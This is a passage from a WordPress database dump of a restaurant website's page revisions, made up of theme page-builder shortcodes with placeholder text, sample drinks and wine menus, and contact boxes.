enable_mousewheel_scroll=\"no\" category=\"cake\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"Menu\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_video_button video_link=\"https://vimeo.com/183648707\" video_image=\"2020\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"accolades\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#e7dfdf\" content_padding=\"124px 0\" title=\"Generic inquiries\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" content_padding=\"124px 0\" title=\"Press\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Job Inquiries\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Events\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][/vc_row]</p>\n','Home 1','','inherit','closed','closed','','3056-autosave-v1','','','2020-12-05 17:49:39','2020-12-05 16:49:39','',3056,'https://www.ristorantesolymar.it/2020/12/05/3056-autosave-v1/',0,'revision','',0),(3364,1,'2020-12-05 17:49:44','2020-12-05 16:49:44','[vc_row][vc_column][rev_slider_vc alias=\"home\" enable_paspartu=\"no\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"visual pleasures\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\" content_text_aligment=\"center\" css=\".vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}\" simple_background_color=\"#e7dfdf\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" enable_fullheight=\"no\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" navigation_skin=\"dark\" enable_pagination=\"no\" enable_mousewheel_scroll=\"no\" category=\"cake\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"Menu\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_video_button video_link=\"https://vimeo.com/183648707\" video_image=\"2020\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"accolades\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#e7dfdf\" content_padding=\"124px 0\" title=\"Generic inquiries\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" content_padding=\"124px 0\" title=\"Press\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Job Inquiries\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Events\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][/vc_row]','Home 1','','inherit','closed','closed','','3056-revision-v1','','','2020-12-05 17:49:44','2020-12-05 16:49:44','',3056,'https://www.ristorantesolymar.it/2020/12/05/3056-revision-v1/',0,'revision','',0),(3365,1,'2020-12-05 17:51:09','2020-12-05 16:51:09','[vc_row][vc_column][rev_slider_vc alias=\"landing\" enable_paspartu=\"no\"][/vc_column][/vc_row]','Landing','','inherit','closed','closed','','2652-revision-v1','','','2020-12-05 17:51:09','2020-12-05 16:51:09','',2652,'https://www.ristorantesolymar.it/2020/12/05/2652-revision-v1/',0,'revision','',0),(3366,1,'2020-12-05 17:52:00','2020-12-05 16:52:00','','No Sidebar','','inherit','closed','closed','','2421-revision-v1','','','2020-12-05 17:52:00','2020-12-05 16:52:00','',2421,'https://www.ristorantesolymar.it/2020/12/05/2421-revision-v1/',0,'revision','',0),(3367,1,'2020-12-05 17:54:31','2020-12-05 16:54:31','[vc_row row_content_width=\"grid\" css=\".vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}\"][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"cocktails\"][vc_empty_space height=\"60px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"desserts\"][vc_empty_space height=\"60px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}\" simple_background_color=\"#111111\"][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list skin=\"light\" alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"desserts\"][vc_empty_space height=\"60px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list skin=\"light\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"cocktails\"][vc_empty_space height=\"60px\"][/vc_column][/vc_row]','Restaurant Menu','','inherit','closed','closed','','1995-revision-v1','','','2020-12-05 17:54:31','2020-12-05 16:54:31','',1995,'https://www.ristorantesolymar.it/2020/12/05/1995-revision-v1/',0,'revision','',0),(3368,1,'2020-12-05 17:55:00','2020-12-05 16:55:00','[vc_row full_height=\"yes\" parallax_background_image=\"352\" parallax_bg_speed=\"0\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner css=\".vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-6 vc_col-md-8\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item background_color=\"rgba(255,255,255,0.9)\" item_padding=\"18% 12% 0\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"\" disable_break_words=\"no\" title=\"Drinks menu\" title_break_words=\"1\" line_length=\"0px\"][/mkdf_section_title][vc_empty_space height=\"65px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Cocktails\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Afterdinner cocktails\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Wine\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Day Wines \'Cancilla Vineyard\' 2014\nUnited States (Willamette) Pinot Noir[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Appetizers\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"120px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner width=\"1/2\" offset=\"vc_col-lg-6 vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Restaurant Menu Left','','inherit','closed','closed','','3043-revision-v1','','','2020-12-05 17:55:00','2020-12-05 16:55:00','',3043,'https://www.ristorantesolymar.it/2020/12/05/3043-revision-v1/',0,'revision','',0),(3369,1,'2020-12-05 17:55:00','2020-12-05 16:55:00','[vc_row full_height=\"yes\" parallax_background_image=\"419\" parallax_bg_speed=\"0\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner offset=\"vc_col-lg-5 vc_col-md-3 vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-7 vc_col-md-9\" css=\".vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item background_color=\"rgba(255,255,255,0.9)\" item_padding=\"16% 12% 0\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"\" disable_break_words=\"no\" line_length=\"0px\" title=\"Food &amp; Drinks Menu\" title_break_words=\"2,3\"][/mkdf_section_title][vc_empty_space height=\"65px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Cocktails\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Afterdinner cocktails\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Wine\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Day Wines \'Cancilla Vineyard\' 2014\nUnited States (Willamette) Pinot Noir[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Appetizers\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"120px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Restaurant Menu Right','','inherit','closed','closed','','3048-revision-v1','','','2020-12-05 17:55:00','2020-12-05 16:55:00','',3048,'https://www.ristorantesolymar.it/2020/12/05/3048-revision-v1/',0,'revision','',0),(3370,1,'2020-12-05 17:55:27','2020-12-05 16:55:27','','Right Sidebar','','inherit','closed','closed','','1679-revision-v1','','','2020-12-05 17:55:27','2020-12-05 16:55:27','',1679,'https://www.ristorantesolymar.it/2020/12/05/1679-revision-v1/',0,'revision','',0),(3371,1,'2020-12-05 17:58:55','2020-12-05 16:58:55','<p>[vc_row css=\".vc_custom_1534251303879{background-color: #eff5f8 !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 5% 0 5%\"][rev_slider_vc alias=\"home\" enable_paspartu=\"no\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534848855900{padding-top: 0px !important;}\"][mkdf_anchor_menu menu_items=\"%5B%7B%22label%22%3A%22resto%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23resto%22%7D%2C%7B%22label%22%3A%22cocktails%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23cocktails%22%7D%2C%7B%22label%22%3A%22drinks%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23drinks%22%7D%2C%7B%22label%22%3A%22visit%20us%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23visitus%22%7D%2C%7B%22label%22%3A%22landing%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%2Flanding%22%7D%5D\"][/vc_column][/vc_row][vc_row disable_background_image=\"1024\" simple_background_image=\"1751\" background_image_position=\"top center\" css=\".vc_custom_1534849547927{margin-top: -1px !important;}\"][vc_column][vc_empty_space height=\"74px\"][vc_row_inner enable_parallax_background_elements=\"yes\" left_parallax_background_element=\"1251\" right_parallax_background_element=\"1252\" anchor=\"resto\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"90px 0 450px 24%\" item_padding_1367_1600=\"90px 0 450px 3%\" item_padding_1025_1366=\"110px 0 450px 0%\" item_padding_769_1024=\"3% 0 441px 17%\" item_padding_681_768=\"60px 0 450px 24%\" item_padding_680=\"36px 10% 450px 10%\"][attika_restaurant_menu_list show_featured_image=\"no\" alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Cocktails\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1534859739459{padding-top: 100px !important;}\"][vc_column_inner css=\".vc_custom_1534927596297{margin-top: -500px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"78px 0% 0 60%\" item_padding_1367_1600=\"122px 0% 0 56%\" item_padding_1025_1366=\"212px 0% 0 44%\" item_padding_769_1024=\"50px 4% 0 22%\" item_padding_681_768=\"40px 0% 53% 24%\" item_padding_680=\"40px 7% 95% 7%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Afterdinner Cocktails\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner css=\".vc_custom_1534927611021{margin-top: -313px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0% 0 23%\" item_padding_769_1024=\"32% 0 0 28%\" item_padding_680=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1828\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner enable_parallax_background_elements=\"yes\" right_parallax_background_element=\"1255\" anchor=\"cocktails\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"68% 0% 0 20%\" item_padding_769_1024=\"15% 0 0 19%\" item_padding_680=\"0% 10% 0 10%\" item_padding_681_768=\"17% 0% 0 23%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1254\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"120px 0% 0 35%\" item_padding_1025_1366=\"126px 0% 0 24%\" item_padding_769_1024=\"120px 0 0 25%\" item_padding_681_768=\"105px 0% 0 24%\" item_padding_680=\"120px 4% 0 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"wine\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner anchor=\"drinks\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0px 0\" item_padding_1025_1366=\"110px 0% 0px 0%\" item_padding_769_1024=\"100px 0 0 23%\" item_padding_681_768=\"94px 0% 0px 20%\" item_padding_680=\"53px 2% 0px 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"beer\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"200px\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" right_parallax_background_element=\"1259\" left_parallax_background_element=\"1488\" css=\".vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" 